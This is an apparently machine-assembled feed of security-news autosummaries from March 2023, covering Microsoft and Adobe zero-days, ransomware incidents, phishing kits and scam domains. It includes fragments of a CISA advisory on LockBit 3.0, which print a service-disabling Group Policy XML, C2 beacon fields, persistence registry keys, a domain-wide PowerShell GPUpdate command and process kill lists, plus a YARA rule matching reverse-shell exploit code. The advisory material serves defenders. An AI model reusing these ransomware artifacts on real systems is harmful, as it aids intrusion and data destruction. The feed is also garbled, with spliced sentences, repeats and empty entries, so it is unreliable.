"Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Tags: patch Tuesday Tags: March Tags: 2023 Tags: Microsoft Tags: Adobe Tags: Fortinet Tags: Android Tags: SAP Tags: CVE-2023-23397 Tags: CVE-2023-24880 Tags: CVE-2023-26360 Tags: CVE-2022-41328 This Patch Tuesday, Microsoft has released fixes for two actively exploited zero-days and Adobe has fixed one. |
The post Update now! Microsoft fixes two zero-day bugs appeared first on Malwarebytes Labs.
"Autosummary:
Commerce APSB23-17, Experience Manager APSB23-18, Illustrator APSB23-19, Dimension APSB23-20, Creative Cloud Desktop Application APSB23-21, Substance 3D Stager APSB23-22, and Photoshop APSB23-23.When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then returns the result of this operation to the service. "Autosummary:
Hive Ransomware The Cybersecurity and Infrastructure Security Agency (CISA), together with the Federal Bureau of Investigation (FBI) and the Department of Health and Human Services (HHS), published a joint alert about the Hive ransomware group, which targeted a wide range of businesses and infrastructure sectors, including Government Facilities, Communications, Critical Manufacturing, Information Technology, and especially Healthcare and Public Health. The ALPHV ransomware gang, aka BlackCat, claimed responsibility for the cyberattack against Creos and added it to its extortion site on Saturday, threatening to publish 180,000 stolen files totaling 150 GB in size, including contracts, agreements, passports, bills, and emails. On December 29, the LockBit ransomware gang took responsibility for the attack against the port, claiming to have stolen financial reports, audits, budgets, contracts, ship logs and other information about cargo and crews.The data leaked includes bank account details, dates of birth, next-of-kin information, national insurance numbers and tax information, health and well-being information, disciplinary and grievance related documents, etc.The attackers used known vulnerabilities (CVE-2022-24521, CVE-2020-1472), phishing, PowerShell scripts, KerberCache tool, compromised credentials and RDP to gain access, then used the Hancitor loader to drop their ransomware.From 2019 through at least June 2022, actors have used this malware to target a wide range of businesses and critical infrastructure organizations, including defense contractors, educational institutions, manufacturers, technology companies, and especially organizations in the healthcare and medical industries.According to the company’s statement, data that was unlawfully accessed potentially included personal information (including names, emails, addresses, taxpayer identification numbers, and banking information of affected individuals and businesses). U-blox U-blox, a Swiss company that creates wireless semiconductors and modules for consumer, automotive and industrial markets, said on October 28 that it had been targeted by a ransomware attack, which was detected and contained on October 24. Tata Power On October 14, the largest Indian energy company, Tata Power Company Limited, confirmed that it was targeted by a cyberattack, which affected its IT infrastructure. EPM In December, Empresas Públicas de Medellín (EPM), a Colombian energy provider, was hit with a ransomware attack, which disrupted the company’s operations and took down online services.The hackers uploaded a sample of the stolen files, including employment contracts, supplier contracts, files on various employees, documents detailing executive compensation packages, and more.Information stolen by the attackers may have included employee names, addresses, dates of birth, direct deposit information, ethnicity, and Social Security numbers. Elbit Systems Elbit Systems of America, a subsidiary of Israeli defense contractor Elbit Systems, confirmed a data breach, several months after a ransomware gang claimed to have hacked the company’s systems. The RansomEXX ransomware gang took responsibility for the “malicious cyberactivity” and for stealing 29.9GB of files pertaining to non-disclosure agreements, passports, IDs, contracts, and supply agreements. The company didn’t name the attacker, but BleepingComputer, which saw a ransom note on one of Semikron systems, reported that LV Ransomware might be behind the attack and that they claim to have stolen two terabytes of company data. Eurocell Eurocell, a UK-based PVC-U manufacturer, was hit by a cyberattack, which led to critical personal details of employees being leaked.The main targets of Cuba ransomware attacks are financial services, government, healthcare and public health, critical manufacturing, and information technology. "Note: this joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
Actions to take today to mitigate cyber threats from ransomware:
The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023.
The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit. Since January 2020, LockBit has functioned as an affiliate-based ransomware variant; affiliates deploying the LockBit RaaS use many varying TTPs and attack a wide range of businesses and critical infrastructure organizations, which can make effective computer network defense and mitigation challenging.
The FBI, CISA, and the MS-ISAC encourage organizations to implement the recommendations in the mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.
Download the PDF versio "
Autosummary:
xml version="1.0" encoding="utf-8"?> <NTServices clsid="{2CFB484A-4E96-4b5d-A0B6-093D2F91E6AE}"> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBDMS" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLPBDMS" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLPBENGINE" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLPBENGINE" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLFDLauncher" image="4" changed="%s" uid="%s" userContext="0" removePolicy="0" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLFDLauncher" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLSERVERAGENT" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLSERVERAGENT" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLServerOLAPService" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLServerOLAPService" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSASTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSASTELEMETRY" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLBrowser" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLBrowser" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Client" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Client" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQL Server Distributed Replay Controller" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQL Server Distributed Replay Controller" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MsDtsServer150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MsDtsServer150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISTELEMETRY150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISTELEMETRY150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutMaster150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISScaleOutMaster150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SSISScaleOutWorker150" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SSISScaleOutWorker150" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLLaunchpad" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLLaunchpad" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLWriter" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLWriter" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="SQLTELEMETRY" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="SQLTELEMETRY" serviceAction="STOP" timeout="30"/> </NTService> <NTService clsid="{AB6F0B67-341F-4e51-92F9-005FBFBA1A43}" name="MSSQLSERVER" image="4" changed="%s" uid="%s" disabled="0"> <Properties startupType="DISABLED" serviceName="MSSQLSERVER" serviceAction="STOP" timeout="60"/> </NTService>Connection: Keep-Alive LIWy=RJ51lB5GM&a4OuN=<Lockbit ID>&LoSyE3=8SZ1hdlhzld4&DHnd99T=rTx9xGlInO6X0zWW&2D6=Bokz&T1guL=MtRZsFCRMKyBmfmqI& 6SF3g=JPDt9lfJIQ&wQadZP=<Base64 encrypted data> Xni=AboZOXwUw&2rQnM4=94L&0b=ZfKv7c&NO1d=M2kJlyus&AgbDTb=xwSpba&8sr=EndL4n0HVZjxPR& m4ZhTTH=sBVnPY&xZDiygN=cU1pAwKEztU&=5q55aFIAfTVQWTEm&4sXwVWcyhy=l68FrIdBESIvfCkvYl Example of information found in encrypted data { "bot_version":"X", "bot_id":"X", "bot_company":"X", "host_hostname":"X", "host_user":"X", "host_os":"X", "host_domain":"X", "host_arch":"X", "host_lang":"X", "disks_info":[ { "disk_name":"X", "disk_size":"XXXX", "free_size":"XXXXX" } User Agent Strings Mozilla/5.0 (Windows NT 6.1) AppleWebKit/587.38 (KHTML, like Gecko) Chrome/91.0.4472.77 Safari/537.36 Edge/91.0.864.37 <NetworkShareSettings clsid="{520870D8-A6E7-47e8-A8D8-E6A4E76EAEC2}"> <NetShare clsid="{2888C5E7-94FC-4739-90AA-2C1536D68BC0}" image="2" name="%%ComputerName%%_D" changed="%s" uid="%s"> <Properties action="U" name="%%ComputerName%%_D" path="D:" comment="" allRegular="0" allHidden="0" allAdminDrive="0" limitUsers="NO_CHANGE" abe="NO_CHANGE"/> Services.xml stops and disables services on the Active Directory (AD) hosts. RESOURCES REPORTING The FBI is seeking any information that can be legally shared, including: Boundary logs showing communication to and from foreign IP addresses Sample ransom note Communications with LockBit 3.0 actors Bitcoin wallet information Decryptor files Benign sample of an encrypted file The FBI, CISA, and MS-ISAC do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Registry Artifacts LockBit 3.0 Icon Registry Key Value Data HKCR\. <Malware Extension> (Default) <Malware Extension> HKCR\<Malware Extension>\DefaultIcon (Default) C:\ProgramData\<Mal ware Extension>.ico LockBit 3.0 Wallpaper Registry Key Value Data HKCU\Control Panel\Desktop\WallPaper (Default) C:\ProgramData\<Mal ware Extension>.bmp Disable Privacy Settings Experience Registry Key Value Data SOFTWARE\Policies\Microsoft\Win dows\OOBE DisablePrivacyE xperience 0 Enable Automatic Logon Registry Key Value Data SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon AutoAdminLogon 1 DefaultUserName <username> Force GPUpdate Powershell Command powershell Get-ADComputer -filter * -Searchbase "%s" | Foreach-Object { Invoke- GPUpdate -computer $_.name -force -RandomDelayInMinutes 0} Services Killed vss sql svc$ memtas mepocs msexchange sophos veeam backup GxVss GxBlr GxFWD GxCVD GxCIMgr Processes Killed sql oracle ocssd dbsnmp synctime agntsvc isqlplussvc xfssvccon mydesktopservice ocautoupds encsvc firefox tbirdconfig mydesktopqos ocomm dbeng50 sqbcoreservice excel infopath msaccess mspu onenote outlook powerpnt steam thebat thunderbird visio winword wordpad notepad LockBit 3.0 Ransom Note ~~~ LockBit 3.0 the world"s fastest and most stable ransomware from 2019~~~ >>>>>Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the FBI, CISA, or the MS-ISAC.[TA0002] Enabling automatic logon for persistence and privilege escalation [T1547] Deleting log files, files in the recycle bin folder, and shadow copies residing on disk [T1485], [T1490] LockBit 3.0 attempts to spread across a victim network by using a preconfigured list of credentials hardcoded at compilation time or a compromised local account with elevated privileges [T1078]. EXFILTRATION LockBit 3.0 affiliates use Stealbit, a custom exfiltration tool used previously with LockBit 2.0 [TA0010]; rclone, an open-source command line cloud storage manager [T1567.002]; and publicly available file sharing services, such as MEGA [T1567.002], to exfiltrate sensitive company data files prior to encryption.LockBit 3.0 performs functions such as: Enumerating system information such as hostname, host configuration, domain information, local drive configuration, remote shares, and mounted external storage devices [T1082] Terminating processes and services [T1489] Launching commands VALIDATE SECURITY CONTROLS In addition to applying mitigations, the FBI, CISA, and the MS-ISAC recommend exercising, testing, and validating your organization"s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. Mutual Exclusion Object (Mutex) Created When executed, LockBit 3.0 will create the mutex, Global\<MD4 hash of machine GUID>, and check to see if this mutex has already been created to avoid running more than one instance of the ransomware. Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers [CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud). The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Multi-State Information Sharing & Analysis Center (MS-ISAC) are releasing this joint CSA to disseminate known LockBit 3.0 ransomware IOCs and TTPs identified through FBI investigations as recently as March 2023. The LockBit 3.0 ransomware operations function as a Ransomware-as-a-Service (RaaS) model and is a continuation of previous versions of the ransomware, LockBit 2.0, and LockBit.State, local, tribal, and territorial (SLTT) government entities can also report to the MS-ISAC (SOC@cisecurity.org or 866-787-4722).[CPG 7.3] in a physically separate, segmented, and secure location (e.g., hard drive, storage device, the cloud). "Autosummary:
The disclosure comes days after Fortinet released patches to address 15 security flaws, including CVE-2022-41328 and a critical heap-based buffer underflow issue impacting FortiOS and FortiProxy (CVE-2023-25610, CVSS score: 9.3). "Cyber security researcher Luca Mella analyzed the Makop ransomware employed in a recent intrusion. Executive summary Introduction The Makop ransomware operators started their infamous criminal business in 2020 leveraging a new variant of the notorious Phobos ransomware. During the last years, the gang maintained a solid presence in the criminal underground even if they did […]
The post Dissecting the malicious arsenal of the Makop ransomware gang appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On Indicators of Compromise and Yara Rules are available in the original post published by Luca Mella https://medium.com/@lcam/makop-the-toolkit-of-a-criminal-gang-53cd44563c11 About the author: Luca Mella, Cyber Security Expert, Response & Threat Intel | Manager In 2019, Luca was mentioned as one of the “32 Influential Malware Research Professionals”.Compilation timestamp (left), main routine (right) During recent Makop intrusions, the tool has been coupled with another executable named “c.exe”, but, unfortunately, it has been erased by the attackers during the disengagement phase. Filename: Everything.exe md5: b69d036d1dcfc5c0657f3a1748608148 The last tool interesting tool spotted in the Makop arsenal is a particular system administration tool rarely used in the Russian criminal underground. "Autosummary:
"Organizations in critical infrastructure sectors whose information systems contain security vulnerabilities associated with ransomware attacks are being notified by the US Cybersecurity and Infrastructure Security Agency (CISA) and urged to implement a fix. A pilot program to strengthen critical infrastructure against ransomware “CISA leverages multiple open-source and internal tools to research and detect vulnerabilities within U.S. critical infrastructure,” the agency explained in the formal announcement of its Ransomware Vulnerability Warning Pilot (RVWP). “CISA additionally leverages … More
The post CISA warns CI operators about vulnerabilities on their networks exploited by ransomware gangs appeared first on Help Net Security.
"Autosummary:
"Autosummary:
" The malware is mainly designed to single out Unix-like platforms running x86, x64 and ARM architectures, with GoBruteforcer attempting to obtain access via a brute-force attack using a list of credentials hard-coded into the binary. "Autosummary:
With over 11 years of experience across various sectors like Financial Services, Retail, Insurance, Government, and Telecommunications, Aaron is a certified GCDA and has expertise in incident response, threat hunting, vulnerability management, cyber security operations, threat intelligence, and consultancy. Initial attack vectors of LockBit include social engineering, such as phishing, spear phishing, and business email compromise (BEC), exploiting public-facing applications, hiring initial access brokers" (IABs), and using stolen credentials to access valid accounts, such as remote desktop protocol (RDP), as well as brute-force cracking attacks. "Autosummary:
The service-based economy that fuels such offerings can also result in double theft, wherein the stolen credentials are sent to both the phishing-as-a-service provider as well as their customers. "Autosummary:
Claim about an SVB-themed BEC attempt (Mastodon) Cyber-intelligence firm Cyble published a similar report today exploring developing SVB-themed threats, warning about these additional domains: svbdebt[.]com svbclaims[.]net svb-usdc[.]com svb-usdc[.]net svbi[.]io banksvb[.]com svbank[.]com svblogin[.]com Many of these sites were registered on the day of the bank"s collapse, March 10, 2023, and are already hosting cryptocurrency scams. "Autosummary:
Stink can collect credentials, bookmarks, and browsing data from Chrome-based browsers, while it can also snap screenshots and steal data from Filezilla, Discord, and Telegram. "Autosummary:
In a post on the Russian social media site VK (also known as VKontakte, effectively the Russian version of Facebook), a statement was posted demanding that the game have Russian voice acting reinstated (it was removed following the invasion of Ukraine), apologise to players based in Russia and Belarus, and unban an acount on the game’s Discord channel. The first-person shooter game, developed by Ukraine-based GSC Game World, is hotly anticipated by fans of its prequel “STALKER: Shadow of Chernobyl,” but isn’t scheduled to be released until December 2023. "Microsoft warns of large-scale phishing attacks orchestrated with an open-source adversary-in-the-middle (AiTM) phishing kit available in the cybercrime ecosystem Adversary-in-the-middle (AiTM) phishing kits are becoming an essential technology in the cybercrime ecosystem that is used by multiple threat actors to launch phishing attacks. AiTM phishing allows threat actors to circumvent multifactor authentication (MFA) through reverse-proxy functionality. […]
The post DEV-1101 AiTM phishing kit is fueling large-scale phishing campaigns appeared first on Security Affairs.
"Autosummary:
Microsoft warns of large-scale phishing attacks orchestrated with an open-source adversary-in-the-middle (AiTM) phishing kit available in the cybercrime ecosystem Adversary-in-the-middle (AiTM) phishing kits are becoming an essential technology in the cybercrime ecosystem that is used by multiple threat actors to launch phishing attacks. "Autosummary:
"Autosummary:
Rubrik is listed on the Clop ransomware data leak site Source: BleepingComputer The Clop ransomware gang has claimed responsibility for the Forta GoAnywhere attacks, telling BleepingComputer that they breached 130 organizations to steal data over ten days. "Autosummary:
The hacking group (tracked as APT28, STRONTIUM, Sednit, Sofacy, and Fancy Bear) sent malicious Outlook notes and tasks to steal NTLM hashes via NTLM negotiation requests by forcing the targets’ devices to authenticate to attacker-controlled SMB shares. "Autosummary:
"Autosummary:
The number of bugs in each vulnerability category is listed below: 21 Elevation of Privilege Vulnerabilities 2 Security Feature Bypass Vulnerabilities 27 Remote Code Execution Vulnerabilities 15 Information Disclosure Vulnerabilities 4 Denial of Service Vulnerabilities 10 Spoofing Vulnerabilities 1 Edge - Chromium Vulnerability This count does not include twenty-one Microsoft Edge vulnerabilities fixed yesterday. "It’s March 2023 Patch Tuesday, and Microsoft has delivered fixes for 74 CVE-numbered vulnerabilities, including two actively exploited in the wild (CVE-2023-23397, CVE-2023-24880) by different threat actors. About CVE-2023-23397 “CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server. No user interaction is required,” Microsoft explained. “The … More
The post Microsoft patches zero-days used by state-sponsored and ransomware threat actors (CVE-2023-23397, CVE-2023-24880) appeared first on Help Net Security.
"Autosummary:
“Microsoft Threat Intelligence assesses that a Russia-based threat actor used the exploit patched in CVE-2023-23397 in targeted attacks against a limited number of organizations in government, transportation, energy, and military sectors in Europe,” the company said, and shared a script that organizations can use to check if they have been among the targets. "Adobe is warning that a critical zero-day flaw in ColdFusion web app development platform was exploited in very limited attacks. Software giant Adobe released security updates for ColdFusion versions 2021 and 2018 to resolve a critical flaw, tracked as CVE-2023-26360 (CVSS base score 8.6), that was exploited in very limited attacks. “Adobe is aware that CVE-2023-26360 has been […]
The post Adobe fixed ColdFusion flaw listed as under active exploit appeared first on Security Affairs.
"Autosummary:
"Categories: Exploits and vulnerabilities Categories: News Categories: Ransomware Tags: Clop Tags: ransomware Tags: GoAnywhere Tags: CVE-2023-0669 The Clop ransomware gang has claimed responsibility for attacking several GoAnywhere MFT customers by exploiting a vulnerability in the managed file transfer software"s administrative interface. |
The post Clop ransomware is victimizing GoAnywhere MFT customers appeared first on Malwarebytes Labs.
"Autosummary:
LicenseResponseServlet</servlet-class> <load-on-startup>0</load-on-startup> </servlet> <servlet-mapping> <servlet-name>Licenses Response Servlet</servlet-name> <url-pattern>/lic/accept/</url-pattern> </servlet-mapping> --> Restart the GoAnywhere MFT application If GoAnywhere MFT is clustered, this change needs to happen on every instance node in the cluster.LicenseResponseServlet</servlet-class> <load-on-startup>0</load-on-startup> </servlet> <servlet-mapping> <servlet-name>Licenses Response Servlet</servlet-name> <url-pattern>/lic/accept/</url-pattern>After: <!-- Add these tags to comment out the following section (as shown) or simply delete this section if you are not familiar with XML comments <servlet> <servlet-name>License Response Servlet</servlet-name> <servlet-class>com.linoma.ga.ui.admin.servlet. "The LockBit ransomware group claims to have stolen confidential data belonging to SpaceX from the systems of Maximum Industries. The LockBit ransomware gang claims to have stolen confidential data of SpaceX after they hacked the systems of production company Maximum Industries. Maximum Industries is a full-service, piece-part production, and contract manufacturing facility. The ransomware gang […]
The post LockBit Ransomware gang claims to have stolen SpaceX confidential data from Maximum Industries appeared first on Security Affairs.
"Autosummary:
"Microsoft Patch Tuesday updates for March 2023 addressed 74 vulnerabilities, including a Windows zero-day exploited in ransomware attacks. Microsoft Patch Tuesday security updates for March 2023 addressed 74 new vulnerabilities in Microsoft Windows and Windows Components; Office and Office Components; Edge (Chromium-based); Microsoft Dynamics; Visual Studio; and Azure. Six of the fixed issues are rated […]
The post Microsoft Patch Tuesday fix Outlook zero-day actively exploited appeared first on Security Affairs.
"Autosummary:
Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "Passwords are still the weakest link in an organization’s network, as proven by the analysis of over 800 million breached passwords, according to Specops Software. The study found 88% of passwords used in successful attacks consisted of 12 characters or less, with the most common being 8 characters (24%). The most common base terms used in passwords were: ‘password’, ‘admin’, ‘welcome’ and ‘p@ssw0rd’. Passwords containing only lowercase letters were the most common character combination found, … More
The post Understanding password behavior key to developing stronger cybersecurity protocols appeared first on Help Net Security.
"Autosummary:
Strong password policy enforcement In Nvidia’s data breach in 2022, where thousands of employee passwords were leaked, many employees had used passwords such as ‘Nvidia’, ‘qwerty’ and ‘nvidia3d’. "Autosummary:
"Autosummary:
"The Transportation Security Administration (TSA) issued a new cybersecurity amendment to the security programs of certain TSA-regulated (airport and aircraft) operators in the aviation sector, following similar measures announced in October 2022 for passenger and freight railroad carriers. This is part of the Department of Homeland Security’s efforts to increase the cybersecurity resilience of U.S. critical infrastructure and follows extensive collaboration with aviation partners. “Protecting our nation’s transportation system is our highest priority and TSA … More
The post TSA issues additional cybersecurity rules for the aviation sector appeared first on Help Net Security.
"Autosummary:
"Keeping up with financial fraud is incredibly difficult because accurate fraud detection requires a deep, real-time analysis of all the events surrounding a transaction. Consider a typical payment transaction: A single transfer of funds to a new payee may not raise suspicion, but when authentication records show a discrepancy between the account owner’s usual geographic location and that of several device logins from multiple IP addresses in the same time frame, the transfer should be … More
The post Fighting financial fraud through fusion centers appeared first on Help Net Security.
"Autosummary:
In an ideal world, firms can use the fusion centers to centralize transactional data from ledgers, databases, and/or the mainframe – including watchlists and external data.Algorithms are developed to understand fraud patterns and intelligently scan, predict, and stop fraudulent activity before it occurs, but they’re only ever as good as the data with which they are built. "Autosummary:
"The use of legitimate web services as a command-and-control (C2) server, such as Telegram, remains the number one choice for different threat actors, ranging from regular cyber criminals to advanced persistent threat actors," the Amsterdam-based company said. "Autosummary:
The development comes amid a surge in new information stealer variants like SYS01stealer, S1deload, Stealc, Titan, ImBetter, WhiteSnake, and Lumma that are offered for sale and come with capabilities to plunder sensitive data under the guise of popular apps and services. "Autosummary:
"Autosummary:
Hackers complain about firm’s stance The hackers posted a message on the Russian social media platform VK, claiming to have stolen a “vast amount of STALKER 2 material,” including the entire storyline, cutscene descriptions, concept art, global maps, and more. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
The cryptocurrency theft involved multiple tokens, including $8.75 million worth of DAI, $18.5 million in WBTC, $33.85 million in USDC, and $135.8 million in stETH. "Autosummary:
"Autosummary:
In January, Fortinet disclosed a very similar series of incidents where a FortiOS SSL-VPN vulnerability patched in December 2022 and tracked as CVE-2022-42475 was also used as a zero-day bug to target government organizations and government-related entities. "Autosummary:
"Categories: Podcast This week on Lock and Code, we speak with author and Twitter pro Becky Holmes about how she teases, fights, and shuts down online romance scammers. |
The post "Brad Pitt," a still body, ketchup, and a knife, or the best trick ever played on a romance scammer, with Becky Holmes: Lock and Code S04E06 appeared first on Malwarebytes Labs.
"Autosummary:
Worse, romance scammers themselves often target vulnerable people, including seniors, widows, and the recently divorced, and they show no remorse when developing long-lasting online relationships, all bit on lies, so that they can emotionally manipulate their victims into handing over hundreds or thousands of dollars. For a couple of years now, Holmes has teased, mocked, strung along, and shut down online romance scammers, much of her work in public view as she shares some of her more exciting stories on Twitter. "Categories: News Categories: Ransomware Tags: ALPHV Tags: BlackCat Tags: Lehigh Valley Health Network Tags: LVHN Russia-linked ransomware group ALPHV has leaked the data it stole from Lehigh Valley Health Network, including clinical photos of women undergoing breast cancer treatment. |
The post Breast cancer photos published by ransomware gang appeared first on Malwarebytes Labs.
"Autosummary:
The Russia-linked ALPHV ransomware group, also known as BlackCat, has posted sensitive clinical photos of breast cancer patients—calling them "nude photos"—to extort money from the Lehigh Valley Health Network (LVHN). "This unconscionable criminal act takes advantage of patients receiving cancer treatment, and LVHN condemns this despicable behavior," LVHN spokesman Brian Downs said, Lehigh Valley News reported. "Here’s how to know you have fallen victim to a scam – and what to do in order to undo or mitigate the damage.
The post 5 signs you’ve fallen for a scam – and what to do next appeared first on WeLiveSecurity
"Autosummary:
This personal data will be bought in large quantities and then used in automated attacks including follow-on phishing, payment fraud, account takeover or new account fraud (NAF).Except there is no stock and they simply take the buyer’s money, requesting payment via instant cash apps like Zelle, Venmo and Cash App, which offer no buyer protection.Except there is no stock and they simply take the buyer’s money, requesting payment via instant cash apps like Zelle, Venmo and Cash App, which offer no buyer protection.In 2021, US consumers reported losing nearly US$6bn to fraud, up 70% on the previous year, according to the FTC.Instagram accounts are worth $45 each, as opposed to $2 for a social security number, according to one report. "US CISA added remote code execution vulnerability in Plex Media Server to its Known Exploited Vulnerabilities Catalog. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added a remote code execution (RCE) vulnerability in the Plex Media Server, tracked as CVE-2020-5741 (CVSS score: 7.2), to its Known Exploited Vulnerabilities Catalog. The three-year-old high-severity flaw is a deserialization of […]
The post CISA adds Plex Media Server bug, exploited in LastPass attack, to Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.
"Autosummary:
Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, Plex) Share this: Email Twitter Print LinkedIn Facebook More Tumblr Pocket Share On "From November 2022 through early January 2023, the Cybersecurity and Infrastructure Security Agency (CISA) and authoring organizations identified the presence of indicators of compromise (IOCs) at a federal civilian executive branch (FCEB) agency. Analysts determined that multiple cyber threat actors, including an APT actor, were able to exploit a .NET deserialization vulnerability (CVE-2019-18935) in Progress Telerik user interface (UI) for ASP.NET AJAX, located in the agency’s Microsoft Internet Information Services (IIS) web server. Successful exploitation of this vulnerability allows for remote code execution. According to Progress Software, Telerik UI for ASP.NET AJAX builds before R1 2020 (2020.1.114) are vulnerable to this exploit.[1]
Actions to take today to mitigate malicious cyber activity:
CISA, the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) are releasing this joint Cybersecurity Advisory (CSA) to provide IT infrastructure defenders with tactics, techniques, and procedures (TTPs), IOCs, and methods to detect and protect against similar exploitation.
Download the PDF version of this report:
Autosummary: rule CISA_10424018_01 { meta: Author = "CISA Code & Media Analysis" Incident = "10424018" Date = "2023-02-07" Last_Modified = "20230216_1500" Actor = "n/a" Family = "n/a" Capabilities = "n/a" Malware_Type = "n/a" Tool_Type = "n/a" Description = "Detects open-source exploit samples" SHA256 = "n/a" strings: $s0 = { 3D 20 7B 20 22 63 6D 22 2C 20 22 64 2E 65 22 2C } $s1 = { 20 22 78 22 2C 20 22 65 22 20 7D 3B } $s2 = { 52 65 76 65 72 73 65 53 68 65 6C 6C 28 29 } $s3 = { 54 65 6C 65 72 69 6B 20 55 49 } $s4 = { 66 69 6C 65 6E 61 6D 65 5F 6C 6F 63 61 6C } $s5 = { 66 69 6C 65 6E 61 6D 65 5F 72 65 6D 6F 74 65 } $s6 = { 41 55 43 69 70 68 65 72 2E 65 6E 63 72 79 70 74 } $s7 = { 31 32 31 66 61 65 37 38 31 36 35 62 61 33 64 34 } $s8 = { 43 6F 6E 6E 65 63 74 53 74 61 67 69 6E 67 53 65 72 76 65 72 28 29 } $s9 = { 53 74 61 67 69 6E 67 53 65 72 76 65 72 53 6F 63 6B 65 74 } $s10 = { 2A 62 75 66 66 65 72 20 3D 20 28 75 6E 73 69 67 6E 65 } $s11 = { 28 2A 29 28 29 29 62 75 66 66 65 72 3B 0A 20 20 20 20 66 75 6E 63 28 29 3B } $s12 = { 75 70 6C 6F 61 64 28 70 61 79 6C 6F 61 64 28 54 65 6D 70 54 61 72 67 65 74 } $s13 = { 36 32 36 31 36 66 33 37 37 35 36 66 32 66 } condition: ($s0 and $s1 and $s2) or ($s3 and $s4 and $s5 and $s6 and $s7) or ($s8 and $s9 and $s10 and $s11) or ($s12 and $s13) } Log Collection, Retention, and Analysis CISA, FBI, and MS-ISAC 